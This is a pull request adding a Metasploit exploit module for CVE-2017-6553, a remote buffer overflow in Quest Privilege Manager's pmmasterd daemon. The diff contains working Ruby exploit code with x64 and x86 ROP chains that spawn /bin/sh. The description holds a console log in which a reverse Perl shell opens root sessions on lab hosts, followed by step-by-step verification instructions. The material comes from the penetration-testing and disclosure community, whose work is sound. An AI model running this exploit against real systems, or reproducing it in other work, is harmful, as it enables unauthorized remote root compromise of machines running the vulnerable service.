### PR TITLE
Add CVE-2017-6553 Quest Privilege Manager pmmasterd Buffer Overflow

### DIFF
--- a/modules/exploits/linux/misc/quest_pmmasterd_bof.rb
+++ b/modules/exploits/linux/misc/quest_pmmasterd_bof.rb
@@ -1,0 +1,202 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Quest Privilege Manager pmmasterd Buffer Overflow',
+      'Description'    => %q{
+        This modules exploits a buffer overflow in the Quest Privilege Manager,
+        a software used to integrate Active Directory with Linux and Unix systems.
+        The vulnerability exists in the pmmasterd daemon, and can only triggered when
+        the host has been configured as a policy server ( Privilege Manager for Unix 
+        or Quest Sudo Plugin). A buffer overflow condition exists when handling
+        requests of type ACT_ALERT_EVENT, where the size of a memcpy can be
+        controlled by the attacker. This module only works against version < 6.0.0-27.
+        Versions up to 6.0.0-50 are also vulnerable, but not supported by this module (stack cookies bypass is required).
+      },
+      'Author'         =>
+        [
+          'm0t'
+        ],
+      'References'     =>
+        [
+          ['CVE', '2017-6553']
+        ],
+      'Payload'        =>
+        {
+          'BadChars'    => "",
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'generic python perl ruby openssl bash-tcp'
+            }
+        },
+      'Arch'           => ARCH_CMD,
+      'Platform'       => 'unix',
+      'Targets'        => 
+        [
+          ['Quest Privilege Manager pmmasterd 6.0.0-27 x64',
+            {
+              :exploit => :exploit_x64,
+              :check => :check_x64
+            }
+          ],
+          ['Quest Privilege Manager pmmasterd 6.0.0-27 x86',
+            {
+              :exploit => :exploit_x86,
+              :check => :check_x86
+            }
+          ]
+        ],
+      'Privileged'     => false, #XXX
+      'DisclosureDate' => 'Apr 09 2017',
+      'DefaultTarget'  => 1
+      ))
+
+    register_options([ Opt::RPORT(12345) ], self.class)
+    register_options( [ Opt::CPORT(rand(1024))], self.class )
+  end
+
+  #definitely not stealthy! sends a crashing request, if the socket dies, or the output is partial it assumes the target has crashed. Although the daemon spawns a new process for each connection, the segfault will appear on syslog 
+  def check
+    unless self.respond_to?(target[:check], true)
+      fail_with(Failure::NoTarget, "Invalid target specified")
+    end
+    
+    return self.send(target[:check])
+  end
+
+  def exploit
+    unless self.respond_to?(target[:exploit], true)
+      fail_with(Failure::NoTarget, "Invalid target specified")
+    end
+
+    request = self.send(target[:exploit])
+
+    connect
+    print_status("Sending trigger")
+    sock.put(request)
+    sock.get_once
+    print_status("Sending payload")
+    sock.put(payload.encoded)
+    disconnect
+  end
+
+  #server should crash after parsing the packet, partial output is returned
+  def check_x64
+    head = [ 0x26c ].pack("N")
+    head << [ 0x700 ].pack("N")
+    head << [ 0x700 ].pack("N")
+    head << "\x00"*68
+
+    body = "PingE4.6 .0.0.27"
+    body << rand_text_alpha(3000)
+
+    request = head + body
+
+    connect
+    print_status("Sending trigger")
+    sock.put(request)
+    res = sock.timed_read(1024, 1)
+    if res.match("Pong4$")
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Unknown
+    end
+  end
+
+  #server should crash while parsing the packet, with no output
+  def check_x86
+    head = [ 0x26c ].pack("N")
+    head << [ 0x700 ].pack("N")
+    head << [ 0x700 ].pack("N")
+    head << "\x00"*68
+
+    body = rand_text_alpha(3000)
+
+    request = head + body
+
+    connect
+    print_status("Sending trigger")
+    sock.put(request)
+    begin
+      res = sock.timed_read(1024, 1)
+      return Exploit::CheckCode::Unknown
+    rescue ::Exception
+      return Exploit::CheckCode::Appears
+    end
+  end
+
+  def exploit_x64
+    head = [ 0x26c ].pack("N")
+    head << [ 0x700 ].pack("N")
+    head << [ 0x700 ].pack("N")
+    head << "\x00"*68
+
+    #rop chain for pmmasterd 6.0.0.27 (which is compiled without -fPIE)
+    ropchain = [
+          0x408f88,   # pop rdi, ret
+          0x4FA215,   # /bin/sh
+          0x40a99e,   # pop rsi ; ret
+          0,          # argv  @rsi
+          0x40c1a0,   # pop rax, ret 
+          0,          # envp @rax
+          0x48c751,   # mov rdx, rax ; pop rbx ; mov rax, rdx ; ret
+          0xcacc013,  # padd    
+          0x408a98,   # execve,
+          0
+    ].pack("Q*")
+
+    body = "PingE4.6 .0.0.27" # this works if encryption is set to AES, which is default, changing E4 to E2 might make it work with DES
+    body << rand_text_alpha(1600)
+    body << ropchain
+    body << rand_text_alpha(0x700 - body.size())
+
+    return head + body
+
+  end
+
+  def exploit_x86
+    head = [ 0x26c ].pack("N")
+    head << [ 0x108 ].pack("N")
+    head << [ 0xcc ].pack("N")
+    head << "\x00"*68
+
+    #rop chain for pmmasterd 6.0.0.27 (which is compiled without -fPIE)
+    ropchain = [
+      0x8093262,  # ret
+      0x73,       # cs reg
+      0x804AE2C,  # execve,
+      0xcacc013,  # padding
+      0x8136CF0,  # /bin/sh
+      0,
+      0
+    ].pack("V*")
+
+    pivotback = 0x08141223  # sub esp, ebx ; retf
+    writable = 0x81766f8    # writable loc
+
+    body = "PingE4.6 .0.0.27" # this works if encryption is set to AES, which is default, changing E4 to E2 might make it work with DES
+    body << rand_text_alpha(104)
+    body << ropchain
+    body << rand_text_alpha(0xb4 - body.size())
+    body << [0x50].pack("V")
+    body << rand_text_alpha(0xc4 - body.size())
+    body << [pivotback].pack("V")
+    body << [writable].pack("V")
+    body << rand_text_alpha(0x108 - body.size())
+
+    return head + body
+  end
+
+end
+

--- a/modules/exploits/linux/misc/quest_pmmasterd_bof.rb
+++ b/modules/exploits/linux/misc/quest_pmmasterd_bof.rb
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
         This modules exploits a buffer overflow in the Quest Privilege Manager,
         a software used to integrate Active Directory with Linux and Unix systems.
         The vulnerability exists in the pmmasterd daemon, and can only triggered when
-        the host has been configured as a policy server ( Privilege Manager for Unix 
+        the host has been configured as a policy server ( Privilege Manager for Unix
         or Quest Sudo Plugin). A buffer overflow condition exists when handling
         requests of type ACT_ALERT_EVENT, where the size of a memcpy can be
         controlled by the attacker. This module only works against version < 6.0.0-27.
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'Arch'           => ARCH_CMD,
       'Platform'       => 'unix',
-      'Targets'        => 
+      'Targets'        =>
         [
           ['Quest Privilege Manager pmmasterd 6.0.0-27 x64',
             {
@@ -67,12 +67,12 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options( [ Opt::CPORT(rand(1024))], self.class )
   end
 
-  #definitely not stealthy! sends a crashing request, if the socket dies, or the output is partial it assumes the target has crashed. Although the daemon spawns a new process for each connection, the segfault will appear on syslog 
+  #definitely not stealthy! sends a crashing request, if the socket dies, or the output is partial it assumes the target has crashed. Although the daemon spawns a new process for each connection, the segfault will appear on syslog
   def check
     unless self.respond_to?(target[:check], true)
       fail_with(Failure::NoTarget, "Invalid target specified")
     end
-    
+
     return self.send(target[:check])
   end
 
@@ -149,10 +149,10 @@ class MetasploitModule < Msf::Exploit::Remote
           0x4FA215,   # /bin/sh
           0x40a99e,   # pop rsi ; ret
           0,          # argv  @rsi
-          0x40c1a0,   # pop rax, ret 
+          0x40c1a0,   # pop rax, ret
           0,          # envp @rax
           0x48c751,   # mov rdx, rax ; pop rbx ; mov rax, rdx ; ret
-          0xcacc013,  # padd    
+          0xcacc013,  # padding
           0x408a98,   # execve,
           0
     ].pack("Q*")

--- a/modules/exploits/linux/misc/quest_pmmasterd_bof.rb
+++ b/modules/exploits/linux/misc/quest_pmmasterd_bof.rb
@@ -22,6 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote
         requests of type ACT_ALERT_EVENT, where the size of a memcpy can be
         controlled by the attacker. This module only works against version < 6.0.0-27.
         Versions up to 6.0.0-50 are also vulnerable, but not supported by this module (a stack cookie bypass is required).
+        NOTE: To use this module it is required to be able to bind a privileged port ( <=1024 ) as the server refuses connections coming from unprivileged ports, which in most situations means that root privileges are required.
       },
       'Author'         =>
         [

--- a/modules/exploits/linux/misc/quest_pmmasterd_bof.rb
+++ b/modules/exploits/linux/misc/quest_pmmasterd_bof.rb
@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote
         or Quest Sudo Plugin). A buffer overflow condition exists when handling
         requests of type ACT_ALERT_EVENT, where the size of a memcpy can be
         controlled by the attacker. This module only works against version < 6.0.0-27.
-        Versions up to 6.0.0-50 are also vulnerable, but not supported by this module (stack cookies bypass is required).
+        Versions up to 6.0.0-50 are also vulnerable, but not supported by this module (a stack cookie bypass is required).
       },
       'Author'         =>
         [
@@ -29,7 +29,8 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'References'     =>
         [
-          ['CVE', '2017-6553']
+          ['CVE', '2017-6553'],
+          ['URL' , 'https://0xdeadface.wordpress.com/2017/04/07/multiple-vulnerabilities-in-quest-privilege-manager-6-0-0-xx-cve-2017-6553-cve-2017-6554/']
         ],
       'Payload'        =>
         {
@@ -57,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ]
         ],
-      'Privileged'     => false, #XXX
+      'Privileged'     => true,
       'DisclosureDate' => 'Apr 09 2017',
       'DefaultTarget'  => 1
       ))

--- a/modules/exploits/linux/misc/quest_pmmasterd_bof.rb
+++ b/modules/exploits/linux/misc/quest_pmmasterd_bof.rb
@@ -22,7 +22,9 @@ class MetasploitModule < Msf::Exploit::Remote
         requests of type ACT_ALERT_EVENT, where the size of a memcpy can be
         controlled by the attacker. This module only works against version < 6.0.0-27.
         Versions up to 6.0.0-50 are also vulnerable, but not supported by this module (a stack cookie bypass is required).
-        NOTE: To use this module it is required to be able to bind a privileged port ( <=1024 ) as the server refuses connections coming from unprivileged ports, which in most situations means that root privileges are required.
+        NOTE: To use this module it is required to be able to bind a privileged port ( <=1024 ) 
+        as the server refuses connections coming from unprivileged ports, which in most situations 
+        means that root privileges are required.
       },
       'Author'         =>
         [


### PR DESCRIPTION
Exploit for a buffer overflow in the pmmasterd service, part of Quest Privilege Manager. This modules works against version 6.0.0-27, x86 and x86_64.

<pre>
msf > use exploit/linux/misc/quest_pmmasterd_bof
msf exploit(quest_pmmasterd_bof) > set RHOST 192.168.56.14
RHOST => 192.168.56.14
msf exploit(quest_pmmasterd_bof) > set PAYLOAD cmd/unix/reverse_perl
PAYLOAD => cmd/unix/reverse_perl
msf exploit(quest_pmmasterd_bof) > show options

Module options (exploit/linux/misc/quest_pmmasterd_bof):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   CPORT  201              no        The local client port
   RHOST  192.168.56.14    yes       The target address
   RPORT  12345            yes       The target port (TCP)


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Quest Privilege Manager pmmasterd 6.0.0-27 x64


msf exploit(quest_pmmasterd_bof) > set LHOST 192.168.56.2
LHOST => 192.168.56.2
msf exploit(quest_pmmasterd_bof) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   Quest Privilege Manager pmmasterd 6.0.0-27 x64
   2   Quest Privilege Manager pmmasterd 6.0.0-27 x86


msf exploit(quest_pmmasterd_bof) > set TARGET 1
TARGET => 1
msf exploit(quest_pmmasterd_bof) > run

[*] Started reverse TCP handler on 192.168.56.2:4444
[*] 192.168.56.14:12345 - Sending trigger
[*] 192.168.56.14:12345 - Sending payload
[*] Command shell session 1 opened (192.168.56.2:4444 -> 192.168.56.14:34451) at 2017-04-11 09:38:40 +0100

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux ubuntu14 3.13.0-107-generic #154-Ubuntu SMP Tue Dec 20 09:57:27 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
^C
Abort session 1? [y/N]  y

[*] 192.168.56.14 - Command shell session 1 closed.  Reason: User exit
msf exploit(quest_pmmasterd_bof) > set TARGET 2
TARGET => 2
msf exploit(quest_pmmasterd_bof) > set RHOST 192.168.56.12
RHOST => 192.168.56.12
msf exploit(quest_pmmasterd_bof) > run

[*] Started reverse TCP handler on 192.168.56.2:4444
[*] 192.168.56.12:12345 - Sending trigger
[*] 192.168.56.12:12345 - Sending payload
[*] Command shell session 2 opened (192.168.56.2:4444 -> 192.168.56.12:44058) at 2017-04-11 09:43:58 +0100

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux ubuntu 3.13.0-105-generic #152~precise1-Ubuntu SMP Fri Dec 2 03:44:36 UTC 2016 i686 i686 i386 GNU/Linux
^C
Abort session 2? [y/N]  y

[*] 192.168.56.12 - Command shell session 2 closed.  Reason: User exit
msf exploit(quest_pmmasterd_bof) >
</pre>

## Installation

- [ ] Get a trial from https://www.quest.com/trials/, Privilege Manager for Sudo or Privilege Manager for Unix, is irrilevant, will both redirect to Privileged Access Suite for Unix, download the first item on the list.
- [ ] search the archive for the correct `qpm-server_6.0.0-27` package, it should be in the server/ folder (both .deb and .rpm pkgs are available for linux)
- [ ] run `/opt/quest/sbin/pmsrvconfig`, accept license
- [ ] service should be up and running now on port 12345

## Verification

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/misc/quest_pmmasterd_bof`
- [ ] `set PAYLOAD cmd/unix/reverse_perl`
- [ ] `set RHOST XXX.XXX.XXX.XXX`
- [ ] `set LHOST XXX.XXX.XXX.XXX`
- [ ] `set TARGET X` (Automatic targeting does not work)
- [ ] `run`
- [ ] Get a shell

